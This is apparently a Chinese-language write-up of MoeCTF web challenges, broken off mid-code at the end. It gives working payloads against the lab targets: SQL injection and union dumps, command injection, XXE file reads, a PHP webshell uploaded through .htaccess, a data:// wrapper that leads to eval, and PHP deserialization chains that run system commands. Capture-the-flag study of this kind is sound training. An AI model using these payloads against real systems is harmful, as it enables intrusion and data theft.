0 Web入门指北

直接放控制台回车就行

image-20250809153948577

moectf{jv@vScr1p7_14_so0o0o0o_inT3r3&t!!!}

01 第一章 神秘的手镯

只有前端验证,网络响应或者是直接控制台输入都行

document.getElementById('passwordInput').value = "VkUpRXYLbkpqYZQtZBOpaIRmsCblcVolXCdboFKykeoYXYmUlPvYVHJsrmazlczaEhgawumAGvRVzXJsyeOzTUBZCFQNcEHRtodwVrkvltIBhBMwItNwOdxdoeLOCswoVnoPDtQyEVqtGraZmAZcZVKVcLajaLoeZAZWDQSFaXeOLTljHfbstUNvDoxpJntJpojvDGAgUKoZaZmrfHIlqbfYZFnFNEgWtKsaBAMgcaiFoClqDjLHnCjQctfVATlMSOeblHJKHCPksZPUPlGHKNTKcnVOHwDMhoJdzAWZvxBzHZKQpLnQtadeDGrtGtlUcyjZqfqbeFrJrhUdICidoHQTaUfNjkJITRDHlVexMipLWiKeCVwemxBnxtkekCLposFnZsrJhytpjmsCrCVkQoCZjzRFAzNVTjEdqKfsfwUEhuTjwVyZAwCfohcRnbiNUqyVZfYSlIuBetGQUOGtbPlcJeHKbFjBTOtGLqsIUfCUXLmcwKDWTQROmwxisWxDzmNWgOCAJOwgYOiqVcwmYFcFqTvTdeQgxZVwpoKQHonXlvYPUWSuXeqjWcuzyHVJaGZqnGcHItLkXvlRteaGhtmwzJlQoTGOvNCrVGsnJpwsZHfwaMjdrbovsvjakagfymNJTfuYVHyLHrvjGVFQoQgJmpUsvTISvSTNAwZFRICjqjLAYAuWMESCLRYGleXmgsbmSOkPHKQhqZaoHLZNfPkBMWSVBLCNDMHYhOkDYiLsmdxLKqpXMQunWpKJvPjeNUkIlYkCFMLTJxehkcxWzImkZgkhFSMJvYEwLsGbfkNxOpwajTnrTpUgMvdeypHMhPNLOrLHDocGsofvgmQBeBxhakuoIhqgSmprQpcWRBoFiKHWKMqCnpLrTOgVhfNGQKYRSqaXixUYTKrqubfhuzitHlkYWMuQwMqLXhYbVWXSMUwEtHFVtaJpvCBteAZiJDlnZXSLnlaHmFjOwvUyLHRSkJzvNkXTGzUStkruMuxCycVTeayVYBkgegPemVNTOsemdXTSOBlcPhRBrDxshupHSBVMdfgdmXpNpFDSXRXYzjTDAOTDCPIvtrPvxjuxLHNtQmqZgiavTalaQaCQbSpReyHDcwrPyukGRPkoDEMiMjvSZWtNEVFISiwMoUFsvMoYEAOlrYCJlwtCBdXwbcVtdcnjQDTbSosBHqpQcKWRMhsEtxWfCDWSPoSIlYzvgWicWVsEjYKJQDGmKDXPqEApHVoQwKZLQBdbvFLsIRqATVAbhfxmwItjrWUlahlsdTMdBWUTUxtzNRdCuxairuHpJLzQdFYtnGfvMHNEOIhYpDJYbAPjpYIXbfdaVhZRYhsERcPzXSFRkbNZafmZsJleiLnTxyXjxwhSUmicufTuBeQRzIPSkRTsDufmBsbNlOvnCjWxYBmxSqZKMjhfyFIlJAyWapjMhbkGyoJPasdRDiuMdREUEdWfhbXpCduhcoqSrvJAUWtaluotyJAckibvqfUvCpvZivygCTkjdjWTozEOaVpXctRXgjTOdhQwxVMZxLGvKsxWQPqZUEYgBXEjwBTcTyfRzjnMaJhdhxBwSNdawoKAlxCiPBPuQvcwMhoIaVXExhvHyEJZPVJpXRoTdZIKgnIQsdfQdivGnowtCpTXafWSJTqmhXvYJCBrHPkndgvTUsUozkxOChMjbNDsvaVYPgMpzTRSUxiRjImAQpgrBstkBDfEgZMvuThQPaJoNvKGByJrlAfiRkAOhiViYdPdNkWjMBcUJoIeCPDYTQGqtUiRqRZQPxSUbtBPLOyqGjhVfORbmBdowGLvGaVLgdIZCdymSUKXnCmpjaCujpxRfKSoEzNzjIEyrLNBgOUsHnmRicnaybJPDyEDPLmyrLaxKZKEokoRdNLqiAGYpDXzFjFyXibscfYIzxvhYtcUesazdQhQMqxgaBKCOCQOVcbsDYgjMTnkxzAjNmfaRYxURiLkxwXzMrFBrvmBSvRvRXVoNsDgBdjYBLrZhdZBrEFPHuKIgRSAQAKZwpcflwIMhlSBkzCSRvMIGVyfHGiGXSnkefymDvulXoQvRXsHZHeQAxSHeyqTSfXCtDHTlqHEAUvySNUqbVxKWQGRZUPxSNjsouFBRidZJGVweIlGrmpaoFwJiAVevozIkJvwLOSQuZDRSXewlpniqGLJlQZardiCizCTKbjTEBhNdwUxFZlulBUsaeXuOewgZhwpmkGjEovefuXrUnYGBjXKpogNSeVhflayIVTUFHvnZqoiZokvlgsWrqgASAJrDaligOtSLZgykRheljBMlzhwrOaEmnJMjKpRHngmvHZyhMaVsfDTLDRQYlsHjLsicuduqhLkQLhVLCXkfQEVFWkPhRXagtGQeVgIjyDhpzYjewIEbJbSuFEShFtaQyLowBaeNdUrjwOEMnFpodofAqrbxrmogmDXqZmFqrTonKAWcGDmIXcynGISwXYKMPtyJzBvbyFOJqSVrmSVfTAJCKJZeucHzbgwOiqHYldqWOZoKXCwHomHfXsyOKVyUAWTjVYvzmsIherMOqzUFwfJFWbLTsWCzoEdKLhLconQGcIueFrcDXgQHSYLpDoHmctrFDvxmgeiAxQxDLPeJzOpvxeXDhulfeXqWIqZlGsTyJSpeykBXsNUgtglFaITJDrkUVkXnJXMFhJNQfKxbHnswGmKAMNeUnERwBHBqfTPUYDZUpOlsEcNVJMHJkcJwTuBlDyfQJNfvJtRcitbmToqjGsjnuWokyAfARhAoIrtCvjFeLqueXyCysyPOlJnTlEoDRNWsTZfCvNzcAKfQljTDmZDHpLtfHfNhEDLPmuvXMfqMjNkgehcMcQAMGuMPyrNdreNATYNGluOzCvbPFWGVSCvNfgVyIsRTscTjanlytQKNlitNHfpYHqrgoDwxTlCuMtgkcKWdXCwUXvOhVjgCJtFpstyjmCapnjNaYDUdaqLZiMcuiaiGvNQBNGBlzAcDaODTXoEjmgeSYTvUPzSvrFdpJRsxQBVuLgOSTLwdlTJTrGRApuyBuSOXfiTbxzxLponpdrQYOPazDYHGseOqUnXyOiGktdyENGowuczQsEpWhAoMuOzUrLtlTGAofZEhduAekEUWKgoHXoKjSUhkVrhyrVDOgnRLJNqOJZeXbzhtPrYxpHlNZeQYgwqwqjTahQSXQgMaEOXvjcqPXWdxMfoEFufWUcYUcloRupDIFUEbUFAsWyAzQJXRoFWpymhCxWyDJIjbNbdHNMhjzcVsaZbGJknpskxGmQeJoDyzAhEcIcgcoiQUiWAcnuHRLEiZQrfcBcirlNAYDYAoGWnkJiJHDYexWXgwPsWhwKgitgLQGoUlcKdbesvNyxpAksIMTItnanPOkAMPLXKTaUsHPbzxcOjzkbiBLnRlCMfRXEhlsAdNtYgeKPnKPMqcxOWzuwmwCihIaliGLtHOkHAUalvGPhOhFCGCtSyixHTzYqKCjlXkogovFKLTGsOsGxGLctFoIuDlmwaioIlZscDApwScysQdGrTbtPNVClnOBCdaznmHNcdInDWeREdnbuAxmYiAvtUJeAoNgcZdGNlPfoMLEzJNSaQJWclYEuAUxTNfsRwldaleLfZeQfVqrTYBMGHvoLnITJyhiPeOygEOyFkZQHIEkvJPIKUnuGyCpaCQcWYEgbmyDtecdRuKDOXqpTSdprlpnvPMnWfHpCsPfAnLRTEBlMXstwgaFAvWRJLdlcaGdiMgAMaOLnBdrYkrzeyxcpbARxQpWsyiZihXfoxlMvHjUmZmweftZbiKflHFjGlqShcpCBDbEYkfeqYbKoeChPqOpmgxhqhChbvgQirEsDFYocPZhpOjQVaXJRFTmRecMLsTIrobjFJdUjpAPbhxwSaIZSWsIhzoQwflmkdnTjXdIQdfolwYnVyuVDmvBxkieNazpkhViqwZRSXzVcJYceDWofHsabfEPyTQBSchopOvuAvrkdTYaeAtokuzMkFTRbXglYpXeKFLGzCkDMOrVpLuKHSwZQWrJefwnrEJLtJCecbKaqXTAQsVQiNiylfGCmaupBoUhnACZNzpTXcHbeyNkFylglQKDAdHCqnYgkSnkskedgvfZchcbVoKCdmIefMIaBCpEDCpGjmAbLHswXmfcHAcirzlTJuKGZTwFzwfjLKFbpFdeqRoNyxcuWgLSqHfLQPQtAhQEUNSKxCzWqLQjXhbJPIMJHoUrUBvionLfvfKtXbFSiAXDAySBEYnFhAUQTvLbivEjXrTBpwntpKZsIKhsjoEhshxditgqlyNOuEhALtnHrqwpdRlJFBFMSDvyuMuYHJtqFmVnwKufyfQHWTASJsJMkUfjqZxToXMzyZIECnPYGLIOzGqksnuathJsDKYiUCNQnvXVpQXDsvCtZFoTcfzdMOwmokHTctvjBGQUApvIyMKFiBWqKVZtmYsPvAdZKHCzGkEcrMWtMfNQOycKQBygPLIDginECaxpeRwGXkjeFICWLNHwLTbigxOEDmkmWqgsOfXCEmLtgcutragMLsEuQwtpgRmGdPEqxkGQhBaJmghgJyXIknvpBqcYMJvwniJbcVrmbotKXRUcfDnGIHioDnLjPaNqsOdTKPoYOCegMhJhjSpTXHUJlpBdpBtofQVJkGbscfRsftKuxbLcaoSPCwuZiFCveFjpasztbaSJYfvGjLZCtclBaVdQJpYUENDmOEMGYXBAZilMFatGoxiACKZLjNuCkLXERmGRprLKbCKYOrBxlhcJgNVIUlTmOtdmSmwUnPWfiGAJeFBQEbJhMbjXFXglTsqEoapCiuzGLpHTJmcuDwOrivWmgYdjmOiZEDPLGNQEcRTJLryvTjUKUdcxkXFSexEmcNaOrnQiGnPqjiCIoHzECujOBpSfVbxIFlaOmvSLyGiGByTHMIgvAFTDADBzHvnvtsNeKoxALIloGFOSTCSvATkArNORyVedcUxswLaHQYVnbEKrLvtKPtZmSHbUCkGckRNGYaBxyzQvPLYFIRYcPEYWcGDizAGFxNJrbnOSXsMfyXRHZaMiZwqKDMvFCJZBZGAHmiHtiknUiHusYQCbtWRiXgBUpRACGBNktaPlsKOFKwTvIAWHJhlRbecdTSDAGSMFMPwlZUrIBcXZROuVFGLJMXZBeRwhOVjLoWJxobefMyHauQLmhFrBxBcfmvTNkLYBjkGHMBYDaJlyebDcXJORuXcyestECJnyHlOzuhcWZSvKcgomoshDMfrSCbZTuKCmlNKABVmYZCMdjKetFlnlNgFZRKBdKietorokrDsNFBxvXeivWopsTqupjfOGJAVoNYPeYfLwfigZlvereIgMqxIgaBxEtSygjfmJVwFvXIxLBPtzRvigznXqGWJKJUHPIsFjfAUIGNczvrstCUWOGJYMKNXtxdGTHbEsnfzCSqOZETQEjTeSreyvBauVuftiaisIavbpMTIjaKbIxljhkDLYOCIugidsYZsiePcpfmFaUyZnsPUBOPIQhDYpFJZpuTKIWQPZNUmKlndqBVuXtoqwQgJXloIXMVspiuTnoHDItWPqKFmqAtDiBnJrmuhNCUXzewatDhkbxpsGtWNBourfckjnoJApwkwoUSxRzIfighspFeHlBLedIBaZWhDEnqUIGRqEzbpEHrfDnEzhUlwXVTgMXtMlQFPMOpDRqRupzmaYjuoWXyjQVnTLreHbQRILYwUiExIQHrUBUPcQfuPjshUokoxlrpBNTcFvHAilAIBZbGNpazSaidJiPSVSPGjCVhWmzufKbXUhbXWYDqKUaSVYLkpedhMZrmulwPcNeVhQHgdTGUTvwMJhBqNrzmyGpeFmkNGaKQTbZHxLxCyZfSOiPgWSPsdgOcyEFdNVCzPFmDiFridqiEQecPJYzSEmLSNUWKwVyhLufNKHphtdJszflFIExprqLvTGhZSyInJUkjFOIMPnrBtoIFCkmOXjvWehXypFhXjpgdqnlpNYzVfukekdrvbDgZsdkTNMckhAkzBfjQXPJtJcFrcupAGPORfHaVPhzdeiDZIotAOJECAotzlvUJrwzkrHynVaJpGpXtoQnOJrxaIveOduwSNXcPgSyvBMsGJhQyxHLobOmURZmslOIWzEBxsNGtsIrAFsqgCwdMskLKmSoQAXOfgIZbRHqFJSbzPWyThwxJmdxZwUSWfDmywzBZqdvkGuBfbgheFofywjXUHQwUBaIviHyQrfuBSYdpyfYoEfTEKUQPREDvQMOAHOvSbGIBLOAfNEXCPgcpuksWgAexTJYgYqHcNVoIcGIsnzCxwvlwRCBfzBmGQzGfMOBlwUxjzruNMHySbnFiXzPVfgYemuRoHZXdZboTdTfVBXpZkiTgjGwurPsvWXMUTbJcYigvpbVbDIRTNsRmHlBYxQKfVcsPoEUpGUVZcHubnACQxaXbnkUDLoYgMDrucPBPBvHLpuqaruHcdcLQKLSAjeZahgeDMZHieHWrhaZntqWgZnFxHsmVxCvWRShFWcvWKYUaoyckPyRxMrDqSopcijkfXoRXizoxWsIZsMWFzLrjZLfJQVIavyJVOekwnpvkFcRLiCfRvrHDRhmxgkgnRoXkSdkuxYedxyaFIHROvgjkSWfiBYGvBZJYncHXjglPagdfCOauESDWDjwhcgCpxOSGChGrUKbAgplusexJbjIoJMrYQufwVXtalkjPZEgcyHktwHJwrItzjPRMbJtHxKrgwXywjuziyJQMcdceTDnqETZAcocwZKIwrXDAfZRzFqZhdlpgQmlvwYRGisnvZWAzdjfKnXibHyZEHraVubuwTkHImiNAIzuyaGhcxsAbmblryGdqiZpSLcLNlJpMAjyWxwqvdAjpyLHZOhnDcGxBqdhAGVgXbJEQsrQYebxvHsLfDzqyrMxuzJaSckybUnjQfPvhqtcDkOzrowDytYZpTNPLpjnQyoDQSwJoivLdueqzSCXdISZknDxvfvhiqSRPvMXeOkvLZWVBZAvlHgOjeTpyvPYFIHnlQTUslXeXbmnZepbKTpcUCkOmKvBAevLUPQMDFhwFOXGCQTGdgtIjPgMSqKJChMDYtsQVKDoCMJAiLOxJsvOhGmQFWqPBPRslSEslUjKWKtlSgoPlpsWdmOLqfubpburfwvoZtnRIKjHpZdpszvWpKxZxjTpzcfDWpXWINOkqTCDMKEbLuaFskiGnFXpRtPyEhrosugbvqujFqlXEMGJmUbzctSaZvLdWZuXgNqGqUTJCygzFlKOYQEVMegCJqBGTfkYbNzTaNJNDfwZSwhvxJGwhdNqIlMiJFILIrtutXzwFbjnTVYXHJbASnpcSiXIzxDOSLmrMgliyhcUAMLUAKcLBoTnsjSzOpOwueSIUDKCEwvgapqdQIeabiLplDxUPSvBAyTVedMAqkguPTekzVfnJBQufwxpFnlBEaBKHxLHLNRdzvAIHJKRCTkdMfEgdnYuMACYEuEvCqowvIpEwrWYOgxMTQEoPZloFQsXTiSiTWnPMgMhLnIvTuyhLxpatpuMfNcBpQNQVmNyJPNEnXDneApYrHtBFRZBmnpqZgJTRzAizNAEWFWpIjOIPtDglsjyBmkIqdoXVuJqotRqewnBQyeMtasZUrxOIkSdyAcjceqkCVMKTsUgNkrNMTxkQNYJhoCMFWshwChQcsfYXUbUqwdXcVGmAiSJQkUQipZYzwPkTKgzOQVxFcLZhDtlfcPxvSGeFoqKIWtQURUNBUneVjuaoGFRDKzQIzlrHMQNRclazUwlXzjASEiYGmTjFceKSyDjZlFixYHGjWTxkvUBREphCMVGwjDyOftflcmuJIDkWPlwJwIHyeDgzxmEwPcLOxSvXwocnUzUEkSCnFHNCJqNYzScRHOpQodtzmXRwhokWRZrcUxVCMNXacRTvBSnrNTasHwONlvsqHSouqCitHcQRgalpuZojXqXezGVZRzqdCkVcMBrskCzCmyQvcmLihbchvgLxYwQWkerjOfKzMBvIVEUNcSWUqhjvSNUcgEHiGZRNjwgLtpMZgUlVARTrvLtuiClwKvpCRGjdqFKQHnoxMDZnfVGboQKBQFhDcGTjQsuClyXqAdsOROSUqDKxeqByrXhdQUDFyaKFwGuPoVOzFNVKHKALgOVPMsljRLmzsJqxaIwJuVMLJMjLijaoWdepVPYIBxFOYxHMFBNPsHcKsEOYWvkNJwCQtIXZoJugmCuqosZNPNVWmdwrGCLeKYUWVHPYieTfGmPtXvGcApKRPNaOmfpuZqcgszpfBqkGstwCfltHvyKTlDQJMQnvqdjixlFpdrKoMLeUmRQHZPlSCQZDCYBNPWlzkzxefvkaQRuqBLSWiDyAvMdgPwPlrJWdBJOZGXHIoywQadaCxjBCwoFpKidtahSJxeowkjSPEgkEtVJAIKNCBsCHvmvtaRvOPdCyEyKSNfgfcVNGmcpSxLfdqSuGcBQzWvgqYMjWrSbvUvKHfDWgLpyuLXrbyKHDZwcAxCbLAzvpGpONrHUWeVmrPRJXIvJmcyMOCnGFxlNtHJSqMIxdnbTJTGnhDCVFICjOdAPxIrUTqJqxmWpbuPobKeaIePRVBpuANzdXrAhILFjZjZMABmnHChWEFBcALWKPtIdbkunmvNAkrmqNHrWHNaoCGyfuRIJCMobejSfRjNkODyOiQWUFIGYfdrYMVrgsfpdNWaSJdamNmcndxnsuFYzcqLTrlxHYvGTAsApADbGyRwLbOSQplEiarGwpdeiwXEQrMuJTkonwiFZqHIfPnxcVEujTmcMHmZCBMSXrKBJauyfquDXcSvhjORznwGsWypVmHmaOmqabGVlNPtErZnHBmKdiSLsnGidfcPesFKgmqIlytWeBoIxLGoquRSibxErSWZncAWPkNVsTgOgzeFtyKtxSiHbCtzyDBPwSOIMaIREVKtJnzCudZJEqxryZPmCVWqVDGdJUsBNlOWJWDMtVzpktzsArwrBTWukEUIvPNtwqpmvGTEGcEizJfyTrEPlKILOUYIANYfeoQdyTRhlkYhsWpkJXAJmvSrgBfmXpCGdsBmnzQehjnUOAJeazoJBgdMrgxMRCzFJXRGAUFnZmjArviHaQodOUtoFocTwVCSoIzXHcvNJwMKNGfJiWDxUfkrSodEXklfiXfoQcXfvaoTbKJaoCGIeXHzoIhYCpvyTepfbMVorMbnocjrSquzUweJwZhxQspDKeyoGCTHKninmndBLcsEyCAIsHmdCNltZLcHcQYIMxbUFMFCZOuEMCTRJHBSeRLRNtxjKCleILBWXunOWQbNXaWMbNOudfbnXUdYgblQphQvErcoQJrcauDhBXgzOYgwkPeFnmFjYwiSNyHDIbJHMHoHPiRtqTdQPGKyxUZmhIclnLvBczomExNjOXCxeLENCOtFyRsLFyvadcousnEProThBQaXyHzuWUaezxmRupaIUsxapBoikqzfzyIMciQuYdhdzIlbrnacuwMjOwTvXbrDGYxYxLrGDYfYRhJewJkMPWClByzMXzulxLTqEuvfkQWkzygNlIbEwdQJZnYEJHrPvApDwAyJFvSbLiejkjowgbPKjSZtdxvzkfwtujxIOsfnGBqdoFPzTJpGYNBPxbMRgnfPwEGkVLdviuAVrTJSDkNZychKDOuyGNudbyersbphlEMPTEdzrzcYOZwCeQWjSrYBhcBRPWFwicGrQFvxYbGrqobhQYMOVNvUiMhdyJUsANqbcTOLynRTjSIdiboiYIpymoZsLgDTVLmybzwJrUXEYxohwFNvoRodRFxFwJYoirFcTAsvXcBGewfJDNpThugezRKDYFlBiglNIvLrHQjEMUWNbhnEhDWaBqeBndEYQXGzDxPQtvtNBsWBvCtZvcfmExJoLOIroXpxFgXdjgwxuxoglGUvesbiVRbgoDcQknlpHClKrKaWNHipSysAvsghVuLVJqsFebadFPeUwBvupSDQYMEnLMflWHiYgsJSkwRuBOVnqO";
validatePassword();

image-20250809163116254

image-20250809163216919

moectf{f_i2_1s_Your_g00d_fri3nd!!}

101 第一章 神秘的手镯_revenge

02 第二章 初识金曦玄轨

源码找到提示/golden_trail

image-20250809163432557

image-20250809163508314

moectf{0bs3rv3_Th3_Gold3n_traiL}

03 第三章 问剑石!篡天改命!

在源码中找到对应的参数进行POST请求即可

GET:test_talent?level=S
POST:{"manifestation":"flowing_azure_clouds"}

image-20250809164940555

moectf{GeT-POST_tR4NsmlS5l0n-Is-a-GoOD_metH0D1ll4e}

04 第四章 金曦破禁与七绝傀儡阵

第一关:磐石傀儡

GET:key=xdsec

image-20250809171648923

第二关:织云傀儡

POST:declaration=织云阁=第一

image-20250809171818952

第三关:溯源傀儡

X-Forwarded-For:127.0.0.1

image-20250809171954117

第四关:器灵傀儡

User-Agent:moe browser

image-20250809172121981

第五关:心印傀儡

Cookie:user=xt

image-20250809172258665

第六关:前尘傀儡

Referer:http://panshi/entry

image-20250809172350215

第七关:逆转傀儡

PUT /void_rebirth HTTP/1.1
Host: 127.0.0.1:57488
Content-Type: text/plain
Content-Length: 11

新生!

也可以用curl

curl -X PUT 127.0.0.1:57488/void_rebirth -H "Content-Type: text/plain"  -d "新生!"

image-20250809172626163

结合起来就是

bW9lY3Rme0MwbjZyNDd1MTQ3MTBuNV95MHVyX2g3N1BfbDN2M2xfMTVfcjM0bGx5X2gxOWghfQ==

moectf{C0n6r47u14710n5_y0ur_h77P_l3v3l_15_r34lly_h19h!}

05 第五章 打上门来!

直接目录穿越即可

../../../../../../flag

image-20250809165051949

moectf{411-INpUT_I5-M@I1ciOU5801c66c}

06 第六章 藏经禁制?玄机初探!

源码有提示,直接尝试爆破试试

image-20250809172919103

好吧没用,有尝试了下万能密码直接登

GET:username=admin&password=1%27+or+1%3D1%23

image-20250809173437684

moectf{W3LCOmE-TO-5QL-iNJecT1Onl110bc9682}

07 第七章 灵蛛探穴与阴阳双生符

访问robots.txt即可找到flag.php,访问找到源码

<?php
highlight_file(__FILE__);
$flag = getenv('FLAG');

$a = $_GET["a"] ?? "";
$b = $_GET["b"] ?? "";

if($a == $b){
    die("error 1");
}

if(md5($a) != md5($b)){
    die("error 2");
}

echo $flag;

简单绕过,直接0e绕过就行

GET:a=QNKCDZO&b=QLTHNDT

image-20250809173819472

moectf{MD5-1S-N0t_sAf3l!213956cca2b}

08 第八章 天衍真言,星图显圣

尝试了之后发现还是在密码这里的注入点

username=1&password=(以下为password尝试值)
1' or 1 order by 2#     //正常
1' or 1 order by 3#     //报错
-1' union select 1,2#    //回显1
-1' union select (select group_concat(schema_name) from information_schema.schemata),2#  //爆库名,information_schema,performance_schema,mysql,user
-1' union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2#  //爆表名,flag,users
-1' union select (select group_concat(column_name) from information_schema.columns where table_name='flag'),2#  //爆列名,value
-1' union select (select group_concat(value) from flag),2#

image-20250809175529603

moectf{unION-b@53d_sQIl_FtW1l141d18e24}

Moe笑传之猜猜爆

看前端逻辑然后直接发现在猜中后向/flag进行POST请求,也没有其他验证,直接请求或者控制台都行

if(userGuess === randomNumber) {
  lastResult.textContent = '恭喜你!猜对了!';
  lastResult.style.backgroundColor = 'green';
  lowOrHi.textContent = '';
  guessField.disabled = true;
  guessBtn.disabled = true;
  // 猜对后请求flag
  fetch('/flag', {method: 'POST'})
    .then(res => res.json())
    .then(data => {
      document.querySelector('.flagResult').textContent = "FLAG: " + data.flag;
    });
  setGameOver();
}

image-20250810190422027

fetch('/flag', {method: 'POST'})
  .then(res => res.json())
  .then(data => console.log(data));

image-20250810190447401

又或者先输出这个数然后直接输入即可

console.log(randomNumber);

image-20250810190741287

image-20250810190746943

moectf{425b9f24-2da4-e414-14c8-675634bb0462}

09 第九章 星墟禁制·天机问路

分号隔开执行命令

GET:url=1;env

image-20250816102325878

moectf{b9f31403-2d87-2d48-5204-f57921c3e8e1}

10 第十章 天机符阵

看着要解析大概是xxe漏洞,并且发现结果中有解析部分,尝试直接引用来获得flag,并且过程中发现不能使用file协议,那就用filter协议

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/resource=flag.txt">
]>
<root>
    <阵枢>引魂玉</阵枢>
    <解析>&xxe;</解析>
    <输出>已定义</输出>
</root>

image-20250818143430943

moectf{G00d_7o6_4nD_XX3_Unl0ck_St4r_S34l}

(PS:其实似乎直接访问flag.txt就有flag了)

10 第十章 天机符阵_revenge

是上题的revenge,将直接访问flag.txt的非预期ban了,并且filter伪协议也被禁用了,直接尝试读取文件就行

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "/flag.txt">
]>
<root>
    <阵枢>引魂玉</阵枢>
    <解析>&xxe;</解析>
    <输出>已定义</输出>
</root>

image-20250816191133441

moectf{7bd76154-49af-4cf6-221b-36d817b3abeb}

111 第十一章 千机变·破妄之眼

HDdss看到了 GET 参数名由m,n,o,p,q这五个字母组成(每个字母出现且仅出现一次),长度正好为 5,虽然不清楚字母的具体顺序,但是他知道参数名等于参数值才能进入。

写个脚本生成排列然后没啥好说的,纯爆破就行

from itertools import permutations

# 定义字母列表
letters = ['m', 'n', 'o', 'p', 'q']

# 生成所有排列组合
all_permutations = permutations(letters)

# 将排列组合转换为字符串列表
permutation_strings = [''.join(p) for p in all_permutations]

# 将结果写入文件
with open('permutations.txt', 'w') as f:
    for perm in permutation_strings:
        f.write(perm + '\n')

print(f"共生成 {len(permutation_strings)} 种排列组合,已保存到 permutations.txt 文件中")

(PS:次数又多爆的又慢,建议挂后台干其他的)

12 第十二章 玉魄玄关·破妄

什么都没过滤的rce

POST:cmd=system("env");

image-20250816104540508

moectf{86960176-47c0-ec40-470b-08bc12637f43}

13 第十三章 通幽关**·**灵纹诡影

直接上传jpg抓包修改后缀,十六进制也用bp改就行

image-20250816105313456

然后直接看环境变量找到flag

image-20250816105359953

moectf{b84b9f5f-278f-fad9-97cf-58f789f234fb}

14 第十四章 御神关·补天玉碑

通过题目提示可以想到是apache的特殊文件.htaccess

<FilesMatch "1.jpg">
  SetHandler application/x-httpd-php
</FilesMatch>

将图片马和配置文件分别上传直接连马就行

image-20250816105807892

moectf{2335551f-5971-b892-cc13-cf80594fa9f4}

摸金偶遇FLAG,拼尽全力难战胜

源码找到以下代码,发现要向/verify路由传输json格式的realCodemyToken

function generateRandomDigitArray(length) {
  return new Promise((resolve, reject) => {
    fetch(`/get_challenge?count=${length}`)
      .then((response) => {
        if (!response.ok) {
          throw new Error(`HTTP error! status: ${response.status}`);
        }
        return response.json();
      })
      .then((data) => {
        if (data.error) {
          reject(data.error);
        } else {
          const real = data.numbers;
          const guess = Array.from({ length }, () => null);
          myToken = data.token; // 保存 token 到 myToken
          resolve({ real, guess });
        }
      })
      .catch((error) => {
        console.error("Error fetching challenge data:", error);
        reject("Failed to fetch challenge data.");
      });
  });
}

fetch("/verify", {
  method: "POST",
  headers: {
    "Content-Type": "application/json"
  },
  body: JSON.stringify({
    answers: realCode,
    token: myToken
  })
})

仔细分析会发现/get_challenge路由会将这两个数据返回,并且注意的是通关时使用的时realCode而不是guessCode,所以还是直接控制台发包就行

(async () => {
  const { numbers, token } = await (await fetch('/get_challenge?count=9')).json();
  const data = await (await fetch('/verify', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ answers: numbers, token })
  })).json();
  console.log('flag =', data.flag);
})();

image-20250818142108747

moectf{9399d1ed-df95-9a1d-b3c5-8d200f8dd423}

115 第十五章 归真关·竞时净魔

猜测文件上传+时间竞争

16 第十六章 昆仑星途

<?php
error_reporting(0);
highlight_file(__FILE__);

include($_GET['file'] . ".php");

直接使用伪协议包含文件就行,data伪协议只要php语句完整了就和后面的没关系了

GET:file=data://text/plain,<?php eval($_POST[123]);?>
POST:123=system("tac /f*");

image-20250823201009412

moectf{d4d81b94-86b6-55df-923b-0c874f251b6c}

17 第十七章 星骸迷阵·神念重构

<?php
highlight_file(__FILE__);

class A {
    public $a;
    function __destruct() {
        eval($this->a);
    }
}

if(isset($_GET['a'])) {
    unserialize($_GET['a']);
}

一个简单的反序列化,直接在a里面构造就行了

<?php

class A {
    public $a;
}

$a=new A();
$a->a='system("cat /f*");';
echo serialize($a);
GET:a=O:1:"A":1:{s:1:"a";s:18:"system("cat /f*");";}

image-20250823201443492

moectf{b95a2fcb-1e33-ed47-1d79-e866d0df7ba2}

18 第十八章 万卷诡阁·功法连环

<?php
highlight_file(__FILE__);

class PersonA {
    private $name;
    function __wakeup() {
        $name=$this->name;
        $name->work();
    }
}

class PersonB {
    public $name;
    function work(){
        $name=$this->name;
        eval($name);
    }

}

if(isset($_GET['person'])) {
    unserialize($_GET['person']);
}

也是直接打就行,exp如下,这里有个私有属性直接改了就行

<?php

class PersonA {
    public $name;
}

class PersonB {
    public $name;
}

$a=new PersonA();
$a->name=new PersonB();
$a->name->name='system("cat /f*");';
echo serialize($a);
#PersonA::__wakeup()->PersonB::work()
GET:person=O:7:"PersonA":1:{s:4:"name";O:7:"PersonB":1:{s:4:"name";s:18:"system("cat /f*");";}}

image-20250823202108342

moectf{8b754005-c94e-8124-e69e-7815e30e7b34}

19 第十九章 星穹真相·补天归源

<?php
highlight_file(__FILE__);

class Person
{
    public $name;
    public $id;
    public $age;

    public function __invoke($id)
    {
        $name = $this->id;
        $name->name = $id;
        $name->age = $this->name;
    }
}

class PersonA extends Person
{
    public function __destruct()
    {
        $name = $this->name;
        $id = $this->id;
        $age = $this->age;
        $name->$id($age);
    }
}

class PersonB extends Person
{
    public function __set($key, $value)
    {
        $this->name = $value;
    }
}

class PersonC extends Person
{
    public function __Check($age)
    {
        if(str_contains($this->age . $this->name,"flag"))
        {
            die("Hacker!");
        }
        $name = $this->name;
        $name($age);
    }

    public function __wakeup()
    {
        $age = $this->age;
        $name = $this->id;
        $name->age = $age;
        $name($this);
    }
}

if(isset($_GET['person']))
{
    $person = unserialize($_GET['person']);
}

通过直接触发__Check执行命令,但是不知道这里的PersonB有什么作用

<?php

class Person
{
    public $name;
    public $id;
    public $age;
}

class PersonA extends Person
{
}

class PersonB extends Person
{
}

class PersonC extends Person
{
}

$a=new PersonA();
$a->name=new PersonC();
$a->id="__Check";
$a->age="cat /f*";
$a->name->name="system";
echo serialize($a);
#PersonA::__destruct()->PersonC::__Check()
GET:person=O:7:"PersonA":3:{s:4:"name";O:7:"PersonC":3:{s:4:"name";s:6:"system";s:2:"id";N;s:3:"age";N;}s:2:"id";s:7:"__Check";s:3:"age";s:7:"cat /f*";}

image-20250823203304262

moectf{e5fedb70-f3f9-52cf-4b3d-ff90b860a13a}

19 第十九章_revenge

<?php
highlight_file(__FILE__);

class Person
{
    public $name;
    public $id;
    public $age;
}

class PersonA extends Person
{
    public function __destruct()
    {
        $name = $this->name;
        $id = $this->id;
        $name->$id($this->age);
    }
}

class PersonB extends Person
{
    public function __set($key, $value)
    {
        $this->name = $value;
    }

    public function __invoke($id)
    {
        $name = $this->id;
        $name->name = $id;
        $name->age = $this->name;
    }
}

class PersonC extends Person
{
    public function check($age)
    {
        $name=$this->name;
        if($age == null)
        {
            die("Age can't be empty.");
        }
        else if($name === "system")
